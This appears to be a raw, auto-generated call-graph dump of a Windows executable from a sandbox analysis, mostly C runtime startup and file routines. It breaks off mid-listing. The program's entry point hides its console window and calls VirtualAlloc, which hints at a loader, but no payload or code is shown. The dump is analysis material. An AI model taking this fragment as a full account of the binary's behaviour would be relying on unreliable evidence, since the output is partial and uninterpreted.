__freea 14 API calls 9831->9833 9832->9829 9833->9832 9835 408db6 __wsopen_s 14 API calls 9834->9835 9836 408e1a 9835->9836 9839 408e4b 9836->9839 9840 40a6a3 __fread_nolock 15 API calls 9839->9840 9841 408e2b 9840->9841 9841->9829 9843 40c140 9842->9843 9845 40c126 9842->9845 9942 40c095 9843->9942 9845->9843 9846 407b6a __dosmaperr 14 API calls 9845->9846 9847 40c135 9846->9847 9848 406567 ___std_exception_copy 39 API calls 9847->9848 9848->9843 9849 40c178 9850 40c1a7 9849->9850 9852 407b6a __dosmaperr 14 API calls 9849->9852 9858 40c1fa 9850->9858 9949 405a08 9850->9949 9854 40c19c 9852->9854 9853 40c1f5 9855 40c272 9853->9855 9853->9858 9856 406567 ___std_exception_copy 39 API calls 9854->9856 9857 406577 __wsopen_s 11 API calls 9855->9857 9856->9850 9859 40c27e 9857->9859 9858->9762 9858->9763 9861 40a21b ___scrt_is_nonwritable_in_current_image 9860->9861 9956 409f3e EnterCriticalSection 9861->9956 9863 40a247 9866 409fe9 __wsopen_s 15 API calls 9863->9866 9864 40a222 9864->9863 9869 40a2b6 EnterCriticalSection 9864->9869 9871 40a269 9864->9871 9868 40a24c 9866->9868 9868->9871 9960 40a137 EnterCriticalSection 9868->9960 9870 40a2c3 LeaveCriticalSection 9869->9870 9869->9871 9870->9864 9957 40a319 9871->9957 9873->9781 9874->9785 9876 40a1d2 9875->9876 9877 40a169 9875->9877 9878 407b6a __dosmaperr 14 API calls 9876->9878 9877->9876 9883 40a18f __wsopen_s 9877->9883 9879 40a1d7 9878->9879 9880 407b57 __dosmaperr 14 API calls 9879->9880 9881 40a1bf 9880->9881 9881->9789 9884 40c27f 9881->9884 9882 40a1b9 SetStdHandle 9882->9881 9883->9881 9883->9882 9885 40c2d9 9884->9885 9886 40c2a7 9884->9886 9885->9789 9886->9885 9887 4068d4 __fread_nolock 41 API calls 9886->9887 9888 40c2b7 9887->9888 9889 40c2c7 9888->9889 9890 40c2dd 9888->9890 9891 407b57 __dosmaperr 14 API calls 9889->9891 9892 407550 __fread_nolock 51 API calls 9890->9892 9893 40c2cc 9891->9893 9894 40c2ef 9892->9894 9893->9885 9897 407b6a __dosmaperr 14 API calls 9893->9897 9895 40c305 9894->9895 9962 40e39e 9894->9962 9895->9893 9896 4068d4 __fread_nolock 41 API calls 9895->9896 9896->9893 9897->9885 9900 40e6b3 ___std_exception_copy 9899->9900 9993 40e6d0 9900->9993 9902 40e6bf 9903 4042bb ___std_exception_copy 39 API calls 9902->9903 9904 40e6cb 9903->9904 9904->9796 9906 40be4b 9905->9906 9907 40bf35 9905->9907 9908 405a08 __wsopen_s 39 API calls 9906->9908 9915 40be6b 9906->9915 9907->9794 9907->9795 9909 40be62 9908->9909 9910 40c065 9909->9910 9909->9915 9911 406577 __wsopen_s 11 API calls 9910->9911 9912 40c06f 9911->9912 9913 40bf5b 9913->9907 9914 407550 __fread_nolock 51 API calls 9913->9914 9918 40bf65 9913->9918 9922 40bf8b 9914->9922 9915->9907 9915->9913 9916 4068d4 __fread_nolock 41 API calls 9915->9916 9917 40bf2c 9915->9917 9919 40bf45 9916->9919 9917->9907 9917->9918 10006 40cfa2 9917->10006 9918->9907 9926 407b6a __dosmaperr 14 API calls 9918->9926 9919->9917 9925 40bf50 9919->9925 9921 40bff6 9930 4068d4 __fread_nolock 41 API calls 9921->9930 9922->9907 9922->9918 9922->9921 9923 40bfd0 9922->9923 9924 40bfc3 9922->9924 9923->9921 9929 40bfd8 9923->9929 9927 407b6a __dosmaperr 14 API calls 9924->9927 9928 4068d4 __fread_nolock 41 API calls 9925->9928 9926->9907 9927->9918 9928->9913 9931 4068d4 __fread_nolock 41 API calls 9929->9931 9930->9918 9931->9918 9932->9800 9934 40a331 9933->9934 9935 40a398 9933->9935 9934->9935 9941 40a35b __wsopen_s 9934->9941 9936 407b6a __dosmaperr 14 API calls 9935->9936 9937 40a39d 9936->9937 9938 407b57 __dosmaperr 14 API calls 9937->9938 9939 40a388 9938->9939 9939->9802 9940 40a382 SetStdHandle 9940->9939 9941->9939 9941->9940 9944 40c0ad 9942->9944 9943 40c0c8 9943->9849 9944->9943 9945 407b6a __dosmaperr 14 API calls 9944->9945 9946 40c0ec 9945->9946 9947 406567 ___std_exception_copy 39 API calls 9946->9947 9948 40c0f7 9947->9948 9948->9849 9950 405a14 9949->9950 9951 405a29 9949->9951 9952 407b6a __dosmaperr 14 API calls 9950->9952 9951->9853 9953 405a19 9952->9953 9954 406567 ___std_exception_copy 39 API calls 9953->9954 9955 405a24 9954->9955 9955->9853 9956->9864 9961 409f86 LeaveCriticalSection 9957->9961 9959 40a289 9959->9768 9959->9769 9960->9871 9961->9959 9963 40e3b1 ___std_exception_copy 9962->9963 9968 40e3d5 9963->9968 9966 4042bb ___std_exception_copy 39 API calls 9967 40e3d0 9966->9967 9967->9895 9988 40e351 9968->9988 9971 40e4ef 9972 4068d4 __fread_nolock 41 API calls 9971->9972 9987 40e4b8 9971->9987 9977 40e507 9972->9977 9973 40e431 9975 408637 _unexpected 14 API calls 9973->9975 9974 4068d4 __fread_nolock 41 API calls 9976 40e3c3 9974->9976 9984 40e43d __wsopen_s 9975->9984 9976->9966 9978 40a3b3 __wsopen_s 39 API calls 9977->9978 9977->9987 9980 40e51f SetEndOfFile 9978->9980 9979 40e445 9982 408694 __freea 14 API calls 9979->9982 9981 40e52b GetLastError 9980->9981 9980->9987 9981->9987 9982->9987 9983 40d0ea __wsopen_s 62 API calls 9983->9984 9984->9979 9984->9983 9985 40e4a9 __wsopen_s 9984->9985 9986 408694 __freea 14 API calls 9985->9986 9986->9987 9987->9974 9989 4068d4 __fread_nolock 41 API calls 9988->9989 9990 40e36a 9989->9990 9991 4068d4 __fread_nolock 41 API calls 9990->9991 9992 40e379 9991->9992 9992->9971 9992->9973 9992->9987 9994 40a3b3 __wsopen_s 39 API calls 9993->9994 9997 40e6e0 9994->9997 9995 40e6e6 9996 40a322 __wsopen_s 15 API calls 9995->9996 10001 40e73e __wsopen_s 9996->10001 9997->9995 9999 40a3b3 __wsopen_s 39 API calls 9997->9999 10005 40e718 9997->10005 9998 40a3b3 __wsopen_s 39 API calls 10000 40e724 CloseHandle 9998->10000 10002 40e70f 9999->10002 10000->9995 10003 40e730 GetLastError 10000->10003 10001->9902 10004 40a3b3 __wsopen_s 39 API calls 10002->10004 10003->9995 10004->10005 10005->9995 10005->9998 10007 40cfb5 ___std_exception_copy 10006->10007 10008 40cfd9 __wsopen_s 64 API calls 10007->10008 10009 40cfc7 10008->10009 10010 4042bb ___std_exception_copy 39 API calls 10009->10010 10011 40cfd4 10010->10011 10011->9917 10012->9748 10073 40128e 10078 4018f8 SetUnhandledExceptionFilter 10073->10078 10075 401293 10079 405c6f 10075->10079 10077 40129e 10078->10075 10080 405c95 10079->10080 10081 405c7b 10079->10081 10080->10077 10081->10080 10082 407b6a __dosmaperr 14 API calls 10081->10082 10083 405c85 10082->10083 10084 406567 ___std_exception_copy 39 API calls 10083->10084 10085 405c90 10084->10085 10085->10077 11240 40669a 11250 408494 11240->11250 11244 4066a7 11263 40bb22 11244->11263 11247 4066d1 11248 408694 __freea 14 API calls 11247->11248 11249 4066dc 11248->11249 11267 408325 11250->11267 11253 40ba77 11254 40ba83 ___scrt_is_nonwritable_in_current_image 11253->11254 11338 409f3e EnterCriticalSection 11254->11338 11256 40bafa 11345 40bb19 11256->11345 11258 40ba8e 11258->11256 11260 40bace DeleteCriticalSection 11258->11260 11339 40e2b6 11258->11339 11262 408694 __freea 14 API calls 11260->11262 11262->11258 11264 40bb39 11263->11264 11265 4066b6 DeleteCriticalSection 11263->11265 11264->11265 11266 408694 __freea 14 API calls 11264->11266 11265->11244 11265->11247 11266->11265 11270 408279 11267->11270 11271 408285 ___scrt_is_nonwritable_in_current_image 11270->11271 11278 409f3e EnterCriticalSection 11271->11278 11273 4082fb 11287 408319 11273->11287 11276 40828f ___scrt_uninitialize_crt 11276->11273 11279 4081ed 11276->11279 11278->11276 11280 4081f9 ___scrt_is_nonwritable_in_current_image 11279->11280 11290 4066e6 EnterCriticalSection 11280->11290 11282 408203 ___scrt_uninitialize_crt 11283 40823c 11282->11283 11291 40842f 11282->11291 11304 40826d 11283->11304 11337 409f86 LeaveCriticalSection 11287->11337 11289 4066a2 11289->11253 11290->11282 11292 408444 ___std_exception_copy 11291->11292 11293 408456 11292->11293 11294 40844b 11292->11294 11296 4083c6 ___scrt_uninitialize_crt 64 API calls 11293->11296 11295 408325 ___scrt_uninitialize_crt 68 API calls 11294->11295 11298 408451 11295->11298 11297 408460 11296->11297 11297->11298 11300 4065ab __fread_nolock 39 API calls 11297->11300 11299 4042bb ___std_exception_copy 39 API calls 11298->11299 11301 40848e 11299->11301 11302 408477 11300->11302 11301->11283 11307 40c783 11302->11307 11336 4066fa LeaveCriticalSection 11304->11336 11306 40825b 11306->11276 11308 40c7a1 11307->11308 11309 40c794 11307->11309 11310 40c7ea 11308->11310 11313 40c7c8 11308->11313 11311 407b6a __dosmaperr 14 API calls 11309->11311 11312 407b6a __dosmaperr 14 API calls 11310->11312 11315 40c799 11311->11315 11314 40c7ef 11312->11314 11318 40c6e1 11313->11318 11317 406567 ___std_exception_copy 39 API calls 11314->11317 11315->11298 11317->11315 11319 40c6ed ___scrt_is_nonwritable_in_current_image 11318->11319 11331 40a137 EnterCriticalSection 11319->11331 11321 40c6fc 11322 40a3b3 __wsopen_s 39 API calls 11321->11322 11329 40c741 11321->11329 11324 40c728 FlushFileBuffers 11322->11324 11323 407b6a __dosmaperr 14 API calls 11325 40c748 11323->11325 11324->11325 11326 40c734 GetLastError 11324->11326 11332 40c777 11325->11332 11327 407b57 __dosmaperr 14 API calls 11326->11327 11327->11329 11329->11323 11331->11321 11335 40a1ec LeaveCriticalSection 11332->11335 11334 40c760 11334->11315 11335->11334 11336->11306 11337->11289 11338->11258 11340 40e2c9 ___std_exception_copy 11339->11340 11348 40e191 11340->11348 11342 40e2d5 11343 4042bb ___std_exception_copy 39 API calls 11342->11343 11344 40e2e1 11343->11344 11344->11258 11398 409f86 LeaveCriticalSection 11345->11398 11347 40bb06 11347->11244 11349 40e19d ___scrt_is_nonwritable_in_current_image 11348->11349 11350 40e1a7 11349->11350 11351 40e1ca 11349->11351 11352 4064ea ___std_exception_copy 39 API calls 11350->11352 11358 40e1c2 11351->11358 11359 4066e6 EnterCriticalSection 11351->11359 11352->11358 11354 40e1e8 11360 40e228 11354->11360 11356 40e1f5 11374 40e220 11356->11374 11358->11342 11359->11354 11361 40e235 11360->11361 11362 40e258 11360->11362 11363 4064ea ___std_exception_copy 39 API calls 11361->11363 11364 4083c6 ___scrt_uninitialize_crt 64 API calls 11362->11364 11371 40e250 11362->11371 11363->11371 11365 40e270 11364->11365 11366 40bb22 14 API calls 11365->11366 11367 40e278 11366->11367 11368 4065ab __fread_nolock 39 API calls 11367->11368 11369 40e284 11368->11369 11377 40e5fd 11369->11377 11371->11356 11373 408694 __freea 14 API calls 11373->11371 11397 4066fa LeaveCriticalSection 11374->11397 11376 40e226 11376->11358 11380 40e626 11377->11380 11383 40e28b 11377->11383 11378 40e675 11379 4064ea ___std_exception_copy 39 API calls 11378->11379 11379->11383 11380->11378 11381 40e64d 11380->11381 11384 40e56c 11381->11384 11383->11371 11383->11373 11385 40e578 ___scrt_is_nonwritable_in_current_image 11384->11385 11392 40a137 EnterCriticalSection 11385->11392 11387 40e586 11388 40e5b7 11387->11388 11389 40e6d0 __wsopen_s 42 API calls 11387->11389 11393 40e5f1 11388->11393 11389->11388 11392->11387 11396 40a1ec LeaveCriticalSection 11393->11396 11395 40e5da 11395->11383 11396->11395 11397->11376 11398->11347 10013 40849d 10014 4084aa 10013->10014 10018 4084c2 10013->10018 10015 407b6a __dosmaperr 14 API calls 10014->10015 10016 4084af 10015->10016 10017 406567 ___std_exception_copy 39 API calls 10016->10017 10019 4084ba 10017->10019 10018->10019 10020 408521 10018->10020 10033 40d306 10018->10033 10022 4065ab __fread_nolock 39 API calls 10020->10022 10023 40853a 10022->10023 10038 407437 10023->10038 10026 4065ab __fread_nolock 39 API calls 10027 408573 10026->10027 10027->10019 10028 4065ab __fread_nolock 39 API calls 10027->10028 10029 408581 10028->10029 10029->10019 10030 4065ab __fread_nolock 39 API calls 10029->10030 10031 40858f 10030->10031 10032 4065ab __fread_nolock 39 API calls 10031->10032 10032->10019 10034 408637 _unexpected 14 API calls 10033->10034 10035 40d323 10034->10035 10036 408694 __freea 14 API calls 10035->10036 10037 40d32d 10036->10037 10037->10020 10039 407443 ___scrt_is_nonwritable_in_current_image 10038->10039 10040 40744b 10039->10040 10044 407466 10039->10044 10041 407b57 __dosmaperr 14 API calls 10040->10041 10042 407450 10041->10042 10043 407b6a __dosmaperr 14 API calls 10042->10043 10067 407458 10043->10067 10045 40747d 10044->10045 10046 4074b8 10044->10046 10047 407b57 __dosmaperr 14 API calls 10045->10047 10048 4074c1 10046->10048 10049 4074d6 10046->10049 10050 407482 10047->10050 10051 407b57 __dosmaperr 14 API calls 10048->10051 10068 40a137 EnterCriticalSection 10049->10068 10053 407b6a __dosmaperr 14 API calls 10050->10053 10054 4074c6 10051->10054 10059 40748a 10053->10059 10056 407b6a __dosmaperr 14 API calls 10054->10056 10055 4074dc 10057 407510 10055->10057 10058 4074fb 10055->10058 10056->10059 10060 407550 __fread_nolock 51 API calls 10057->10060 10061 407b6a __dosmaperr 14 API calls 10058->10061 10062 406567 ___std_exception_copy 39 API calls 10059->10062 10063 40750b 10060->10063 10064 407500 10061->10064 10062->10067 10069 407548 10063->10069 10065 407b57 __dosmaperr 14 API calls 10064->10065 10065->10063 10067->10019 10067->10026 10068->10055 10072 40a1ec LeaveCriticalSection 10069->10072 10071 40754e 10071->10067 10072->10071 8375 4012a0 8376 4012ac ___scrt_is_nonwritable_in_current_image 8375->8376 8401 4014a2 8376->8401 8378 4012b3 8379 40140c 8378->8379 8389 4012dd ___scrt_is_nonwritable_in_current_image __FrameHandler3::FrameUnwindToState ___scrt_release_startup_lock 8378->8389 8434 401796 IsProcessorFeaturePresent 8379->8434 8381 401413 8438 4059f2 8381->8438 8386 4012fc 8387 40137d 8412 405664 8387->8412 8389->8386 8389->8387 8427 4059cc 8389->8427 8391 401383 8416 401000 GetConsoleWindow ShowWindow 8391->8416 8402 4014ab 8401->8402 8444 401a05 IsProcessorFeaturePresent 8402->8444 8406 4014bc 8407 4014c0 8406->8407 8454 4060e1 8406->8454 8407->8378 8410 4014d7 8410->8378 8413 40566d 8412->8413 8415 405672 8412->8415 8770 4053be 8413->8770 8415->8391 9143 404813 8416->9143 8423 404b74 66 API calls 8424 401075 VirtualAlloc 8423->8424 9158 404d87 8424->9158 8428 406182 ___scrt_is_nonwritable_in_current_image 8427->8428 8429 4059e2 _unexpected 8427->8429 8430 406c70 _unexpected 39 API calls 8428->8430 8429->8387 8431 406193 8430->8431 8432 40623e __FrameHandler3::FrameUnwindToState 39 API calls 8431->8432 8433 4061bd 8432->8433 8435 4017ac __fread_nolock __FrameHandler3::FrameUnwindToState 8434->8435 8436 401857 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 8435->8436 8437 4018a2 __FrameHandler3::FrameUnwindToState 8436->8437 8437->8381 9597 405826 8438->9597 8441 4059b6 8442 405826 __FrameHandler3::FrameUnwindToState 21 API calls 8441->8442 8443 401421 8442->8443 8445 4014b7 8444->8445 8446 401ebe 8445->8446 8463 4024f1 8446->8463 8450 401ecf 8451 401eda 8450->8451 8477 40252d 8450->8477 8451->8406 8453 401ec7 8453->8406 8517 40b0ca 8454->8517 8457 401edd 8458 401ef0 8457->8458 8459 401ee6 8457->8459 8458->8407 8460 4024d6 ___vcrt_uninitialize_ptd 6 API calls 8459->8460 8461 401eeb 8460->8461 8462 40252d ___vcrt_uninitialize_locks DeleteCriticalSection 8461->8462 8462->8458 8464 4024fa 8463->8464 8466 402523 8464->8466 8467 401ec3 8464->8467 8481 40276d 8464->8481 8468 40252d ___vcrt_uninitialize_locks DeleteCriticalSection 8466->8468 8467->8453 8469 4024a3 8467->8469 8468->8467 8498 40267e 8469->8498 8472 4024b8 8472->8450 8475 4024d3 8475->8450 8478 402557 8477->8478 8479 402538 8477->8479 8478->8453 8480 402542 DeleteCriticalSection 8479->8480 8480->8478 8480->8480 8486 402593 8481->8486 8484 4027a5 InitializeCriticalSectionAndSpinCount 8485 402790 8484->8485 8485->8464 8487 4025b0 8486->8487 8488 4025b4 8486->8488 8487->8484 8487->8485 8488->8487 8489 40261c GetProcAddress 8488->8489 8491 40260d 8488->8491 8493 402633 LoadLibraryExW 8488->8493 8489->8487 8491->8489 8492 402615 FreeLibrary 8491->8492 8492->8489 8494 40264a GetLastError 8493->8494 8495 40267a 8493->8495 8494->8495 8496 402655 ___vcrt_InitializeCriticalSectionEx 8494->8496 8495->8488 8496->8495 8497 40266b LoadLibraryExW 8496->8497 8497->8488 8499 402593 ___vcrt_InitializeCriticalSectionEx 5 API calls 8498->8499 8500 402698 8499->8500 8501 4026b1 TlsAlloc 8500->8501 8502 4024ad 8500->8502 8502->8472 8503 40272f 8502->8503 8504 402593 ___vcrt_InitializeCriticalSectionEx 5 API calls 8503->8504 8505 402749 8504->8505 8506 402764 TlsSetValue 8505->8506 8507 4024c6 8505->8507 8506->8507 8507->8475 8508 4024d6 8507->8508 8509 4024e0 8508->8509 8510 4024e6 8508->8510 8512 4026b9 8509->8512 8510->8472 8513 402593 ___vcrt_InitializeCriticalSectionEx 5 API calls 8512->8513 8514 4026d3 8513->8514 8515 4026eb TlsFree 8514->8515 8516 4026df 8514->8516 8515->8516 8516->8510 8518 40b0da 8517->8518 8519 4014c9 8517->8519 8518->8519 8522 407a41 8518->8522 8534 407991 8518->8534 8519->8410 8519->8457 8523 407a4d ___scrt_is_nonwritable_in_current_image 8522->8523 8539 409f3e EnterCriticalSection 8523->8539 8525 407a54 8540 40a099 8525->8540 8528 407a72 8559 407a98 8528->8559 8533 407991 2 API calls 8533->8528 8535 407998 8534->8535 8536 4079db GetStdHandle 8535->8536 8537 407a3d 8535->8537 8538 4079ee GetFileType 8535->8538 8536->8535 8537->8518 8538->8535 8539->8525 8541 40a0a5 ___scrt_is_nonwritable_in_current_image 8540->8541 8542 40a0ae 8541->8542 8543 40a0cf 8541->8543 8570 407b6a 8542->8570 8562 409f3e EnterCriticalSection 8543->8562 8548 407a63 8548->8528 8553 4078db GetStartupInfoW 8548->8553 8549 40a107 8576 40a12e 8549->8576 8550 40a0db 8550->8549 8563 409fe9 8550->8563 8554 4078f8 8553->8554 8555 40798c 8553->8555 8554->8555 8556 40a099 40 API calls 8554->8556 8555->8533 8557 407920 8556->8557 8557->8555 8558 407950 GetFileType 8557->8558 8558->8557 8769 409f86 LeaveCriticalSection 8559->8769 8561 407a83 8561->8518 8562->8550 8579 408637 8563->8579 8565 40a008 8591 408694 8565->8591 8567 409ffb 8567->8565 8586 40af1f 8567->8586 8624 406dc1 GetLastError 8570->8624 8572 407b6f 8573 406567 8572->8573 8688 4064b3 8573->8688 8768 409f86 LeaveCriticalSection 8576->8768 8578 40a135 8578->8548 8580 408644 _unexpected 8579->8580 8581 408684 8580->8581 8582 40866f RtlAllocateHeap 8580->8582 8597 40b172 8580->8597 8584 407b6a __dosmaperr 13 API calls 8581->8584 8582->8580 8583 408682 8582->8583 8583->8567 8584->8583 8610 40acdf 8586->8610 8588 40af3b 8589 40af59 InitializeCriticalSectionAndSpinCount 8588->8589 8590 40af44 8588->8590 8589->8590 8590->8567 8592 40869f HeapFree 8591->8592 8596 4086c9 8591->8596 8593 4086b4 GetLastError 8592->8593 8592->8596 8594 4086c1 __dosmaperr 8593->8594 8595 407b6a __dosmaperr 12 API calls 8594->8595 8595->8596 8596->8550 8600 40b19e 8597->8600 8601 40b1aa ___scrt_is_nonwritable_in_current_image 8600->8601 8606 409f3e EnterCriticalSection 8601->8606 8603 40b1b5 __FrameHandler3::FrameUnwindToState 8607 40b1ec 8603->8607 8606->8603 8608 409f86 __FrameHandler3::FrameUnwindToState LeaveCriticalSection 8607->8608 8609 40b17d 8608->8609 8609->8580 8611 40ad0f 8610->8611 8615 40ad0b _unexpected 8610->8615 8611->8615 8616 40ac14 8611->8616 8614 40ad29 GetProcAddress 8614->8615 8615->8588 8622 40ac25 ___vcrt_InitializeCriticalSectionEx 8616->8622 8617 40acbb 8617->8614 8617->8615 8618 40ac43 LoadLibraryExW 8619 40acc2 8618->8619 8620 40ac5e GetLastError 8618->8620 8619->8617 8621 40acd4 FreeLibrary 8619->8621 8620->8622 8621->8617 8622->8617 8622->8618 8623 40ac91 LoadLibraryExW 8622->8623 8623->8619 8623->8622 8625 406ddd 8624->8625 8626 406dd7 8624->8626 8630 406de1 SetLastError 8625->8630 8652 40aedd 8625->8652 8647 40ae9e 8626->8647 8630->8572 8632 408637 _unexpected 12 API calls 8633 406e0e 8632->8633 8634 406e16 8633->8634 8635 406e27 8633->8635 8636 40aedd _unexpected 6 API calls 8634->8636 8637 40aedd _unexpected 6 API calls 8635->8637 8638 406e24 8636->8638 8639 406e33 8637->8639 8643 408694 __freea 12 API calls 8638->8643 8640 406e37 8639->8640 8641 406e4e 8639->8641 8642 40aedd _unexpected 6 API calls 8640->8642 8657 406a9e 8641->8657 8642->8638 8643->8630 8646 408694 __freea 12 API calls 8646->8630 8648 40acdf _unexpected 5 API calls 8647->8648 8649 40aeba 8648->8649 8650 40aed5 TlsGetValue 8649->8650 8651 40aec3 8649->8651 8651->8625 8653 40acdf _unexpected 5 API calls 8652->8653 8654 40aef9 8653->8654 8655 406df9 8654->8655 8656 40af17 TlsSetValue 8654->8656 8655->8630 8655->8632 8662 406932 8657->8662 8663 40693e ___scrt_is_nonwritable_in_current_image 8662->8663 8676 409f3e EnterCriticalSection 8663->8676 8665 406948 8677 406978 8665->8677 8668 406a44 8669 406a50 ___scrt_is_nonwritable_in_current_image 8668->8669 8680 409f3e EnterCriticalSection 8669->8680 8671 406a5a 8681 406c25 8671->8681 8673 406a72 8685 406a92 8673->8685 8676->8665 8678 409f86 __FrameHandler3::FrameUnwindToState LeaveCriticalSection 8677->8678 8679 406966 8678->8679 8679->8668 8680->8671 8682 406c34 _unexpected 8681->8682 8684 406c5b _unexpected 8681->8684 8683 40a88f _unexpected 14 API calls 8682->8683 8682->8684 8683->8684 8684->8673 8686 409f86 __FrameHandler3::FrameUnwindToState LeaveCriticalSection 8685->8686 8687 406a80 8686->8687 8687->8646 8689 4064c5 ___std_exception_copy 8688->8689 8694 4064ea 8689->8694 8691 4064dd 8705 4042bb 8691->8705 8695 406501 8694->8695 8696 4064fa 8694->8696 8701 40650f 8695->8701 8715 406342 8695->8715 8711 4046be GetLastError 8696->8711 8699 406536 8699->8701 8718 406577 IsProcessorFeaturePresent 8699->8718 8701->8691 8702 406566 8703 4064b3 ___std_exception_copy 39 API calls 8702->8703 8704 406573 8703->8704 8704->8691 8706 4042c7 8705->8706 8707 4042de 8706->8707 8750 404704 8706->8750 8709 404704 ___std_exception_copy 39 API calls 8707->8709 8710 4042f1 8707->8710 8709->8710 8710->8548 8712 4046d7 8711->8712 8722 406e72 8712->8722 8716 406366 8715->8716 8717 40634d GetLastError SetLastError 8715->8717 8716->8699 8717->8699 8719 406583 8718->8719 8744 40636b 8719->8744 8723 406e85 8722->8723 8724 406e8b 8722->8724 8726 40ae9e _unexpected 6 API calls 8723->8726 8725 40aedd _unexpected 6 API calls 8724->8725 8743 4046ef SetLastError 8724->8743 8727 406ea5 8725->8727 8726->8724 8728 408637 _unexpected 14 API calls 8727->8728 8727->8743 8729 406eb5 8728->8729 8730 406ed2 8729->8730 8731 406ebd 8729->8731 8732 40aedd _unexpected 6 API calls 8730->8732 8733 40aedd _unexpected 6 API calls 8731->8733 8734 406ede 8732->8734 8735 406ec9 8733->8735 8736 406ef1 8734->8736 8737 406ee2 8734->8737 8740 408694 __freea 14 API calls 8735->8740 8739 406a9e _unexpected 14 API calls 8736->8739 8738 40aedd _unexpected 6 API calls 8737->8738 8738->8735 8741 406efc 8739->8741 8740->8743 8742 408694 __freea 14 API calls 8741->8742 8742->8743 8743->8695 8745 406387 __fread_nolock __FrameHandler3::FrameUnwindToState 8744->8745 8746 4063b3 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 8745->8746 8749 406484 __FrameHandler3::FrameUnwindToState 8746->8749 8747 401be5 _ValidateLocalCookies 5 API calls 8748 4064a2 GetCurrentProcess TerminateProcess 8747->8748 8748->8702 8749->8747 8751 404717 8750->8751 8752 40470e 8750->8752 8751->8707 8753 4046be ___std_exception_copy 16 API calls 8752->8753 8754 404713 8753->8754 8754->8751 8757 40623e 8754->8757 8758 40b2c7 __FrameHandler3::FrameUnwindToState EnterCriticalSection LeaveCriticalSection 8757->8758 8759 406243 8758->8759 8760 40b30c __FrameHandler3::FrameUnwindToState 38 API calls 8759->8760 8762 40624e 8759->8762 8760->8762 8761 406258 IsProcessorFeaturePresent 8763 406264 8761->8763 8762->8761 8767 406277 8762->8767 8765 40636b __FrameHandler3::FrameUnwindToState 8 API calls 8763->8765 8764 4059b6 __FrameHandler3::FrameUnwindToState 21 API calls 8766 406281 8764->8766 8765->8767 8767->8764 8768->8578 8769->8561 8771 4053dd 8770->8771 8772 4053c7 8770->8772 8771->8415 8772->8771 8776 4053ea 8772->8776 8774 4053d4 8774->8771 8793 405555 8774->8793 8777 4053f3 8776->8777 8778 4053f6 8776->8778 8777->8774 8801 409616 8778->8801 8783 405413 8829 405444 8783->8829 8784 405407 8785 408694 __freea 14 API calls 8784->8785 8787 40540d 8785->8787 8787->8774 8789 408694 __freea 14 API calls 8790 405437 8789->8790 8791 408694 __freea 14 API calls 8790->8791 8792 40543d 8791->8792 8792->8774 8794 4055c6 8793->8794 8799 405564 8793->8799 8794->8771 8795 409a30 WideCharToMultiByte __wsopen_s 8795->8799 8796 408637 _unexpected 14 API calls 8796->8799 8797 4055ca 8798 408694 __freea 14 API calls 8797->8798 8798->8794 8799->8794 8799->8795 8799->8796 8799->8797 8800 408694 __freea 14 API calls 8799->8800 8800->8799 8802 4053fc 8801->8802 8803 40961f 8801->8803 8807 409ad3 GetEnvironmentStringsW 8802->8807 8851 406d2b 8803->8851 8808 405401 8807->8808 8809 409aeb 8807->8809 8808->8783 8808->8784 8810 409a30 __wsopen_s WideCharToMultiByte 8809->8810 8811 409b08 8810->8811 8812 409b12 FreeEnvironmentStringsW 8811->8812 8813 409b1d 8811->8813 8812->8808 8814 40a6a3 __fread_nolock 15 API calls 8813->8814 8815 409b24 8814->8815 8816 409b2c 8815->8816 8817 409b3d 8815->8817 8818 408694 __freea 14 API calls 8816->8818 8819 409a30 __wsopen_s WideCharToMultiByte 8817->8819 8820 409b31 FreeEnvironmentStringsW 8818->8820 8821 409b4d 8819->8821 8822 409b6e 8820->8822 8823 409b54 8821->8823 8824 409b5c 8821->8824 8822->8808 8826 408694 __freea 14 API calls 8823->8826 8825 408694 __freea 14 API calls 8824->8825 8827 409b5a FreeEnvironmentStringsW 8825->8827 8826->8827 8827->8822 8830 405459 8829->8830 8831 408637 _unexpected 14 API calls 8830->8831 8832 405480 8831->8832 8833 405488 8832->8833 8843 405492 8832->8843 8834 408694 __freea 14 API calls 8833->8834 8835 40541a 8834->8835 8835->8789 8836 4054ef 8837 408694 __freea 14 API calls 8836->8837 8837->8835 8838 408637 _unexpected 14 API calls 8838->8843 8839 4054fe 9137 405526 8839->9137 8843->8836 8843->8838 8843->8839 8845 405519 8843->8845 8848 408694 __freea 14 API calls 8843->8848 9128 4061e4 8843->9128 8844 408694 __freea 14 API calls 8847 40550b 8844->8847 8846 406577 __wsopen_s 11 API calls 8845->8846 8849 405525 8846->8849 8850 408694 __freea 14 API calls 8847->8850 8848->8843 8850->8835 8852 406d36 8851->8852 8856 406d3c 8851->8856 8854 40ae9e _unexpected 6 API calls 8852->8854 8853 40aedd _unexpected 6 API calls 8855 406d56 8853->8855 8854->8856 8857 406d42 8855->8857 8858 408637 _unexpected 14 API calls 8855->8858 8856->8853 8856->8857 8859 40623e __FrameHandler3::FrameUnwindToState 39 API calls 8857->8859 8860 406d47 8857->8860 8861 406d66 8858->8861 8862 406dc0 8859->8862 8876 409421 8860->8876 8863 406d83 8861->8863 8864 406d6e 8861->8864 8866 40aedd _unexpected 6 API calls 8863->8866 8865 40aedd _unexpected 6 API calls 8864->8865 8867 406d7a 8865->8867 8868 406d8f 8866->8868 8873 408694 __freea 14 API calls 8867->8873 8869 406da2 8868->8869 8870 406d93 8868->8870 8872 406a9e _unexpected 14 API calls 8869->8872 8871 40aedd _unexpected 6 API calls 8870->8871 8871->8867 8874 406dad 8872->8874 8873->8857 8875 408694 __freea 14 API calls 8874->8875 8875->8860 8899 409576 8876->8899 8882 409475 8883 40948b 8882->8883 8884 40947d 8882->8884 8924 409671 8883->8924 8885 408694 __freea 14 API calls 8884->8885 8887 409464 8885->8887 8887->8802 8889 4094c3 8890 407b6a __dosmaperr 14 API calls 8889->8890 8891 4094c8 8890->8891 8893 408694 __freea 14 API calls 8891->8893 8892 40950a 8895 409553 8892->8895 8935 40909a 8892->8935 8893->8887 8894 4094de 8894->8892 8897 408694 __freea 14 API calls 8894->8897 8896 408694 __freea 14 API calls 8895->8896 8896->8887 8897->8892 8900 409582 ___scrt_is_nonwritable_in_current_image 8899->8900 8908 40959c 8900->8908 8943 409f3e EnterCriticalSection 8900->8943 8902 40623e __FrameHandler3::FrameUnwindToState 39 API calls 8907 409615 8902->8907 8903 40944b 8910 4091a8 8903->8910 8904 4095ac 8905 4095d8 8904->8905 8909 408694 __freea 14 API calls 8904->8909 8944 4095f5 8905->8944 8908->8902 